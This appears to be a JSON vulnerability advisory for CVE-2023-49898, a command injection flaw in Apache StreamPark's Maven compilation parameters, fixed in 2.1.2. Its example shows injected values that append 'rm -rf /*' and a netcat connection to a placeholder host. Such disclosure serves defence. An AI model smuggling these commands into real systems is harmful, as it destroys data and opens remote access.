{
  "affected": [
    {
      "ranges": [
        {
          "database_specific": {
            "versions": [
              {
                "introduced": "2.0.0"
              },
              {
                "fixed": "2.1.2"
              }
            ]
          },
          "events": [
            {
              "introduced": "6788ebae61d2f6d5122572229ce0a3a2555cc46d"
            },
            {
              "fixed": "e662e47418f5b20c9fcbd86939132194ec77e76e"
            }
          ],
          "repo": "https://github.com/apache/incubator-streampark",
          "type": "GIT"
        }
      ]
    }
  ],
  "details": "In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\n\nMitigation:\n\nall users should upgrade to 2.1.2\n\nExample:\n\n##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use \u0026\u0026, compilation failure use \"||\" or \"\u0026\u0026\":\n\n/usr/share/java/maven-3/conf/settings.xml || rm -rf /*\n\n/usr/share/java/maven-3/conf/settings.xml \u0026\u0026 nohup nc x.x.x.x 8899 \u0026\n\n",
  "id": "CVE-2023-49898",
  "modified": "2026-03-13T21:47:51.581490390Z",
  "published": "2023-12-15T13:15:07.330Z",
  "references": [
    {
      "type": "ARTICLE",
      "url": "https://lists.apache.org/thread/qj99c03r4td35f8gbxq084b8qmv2fyr3"
    }
  ],
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}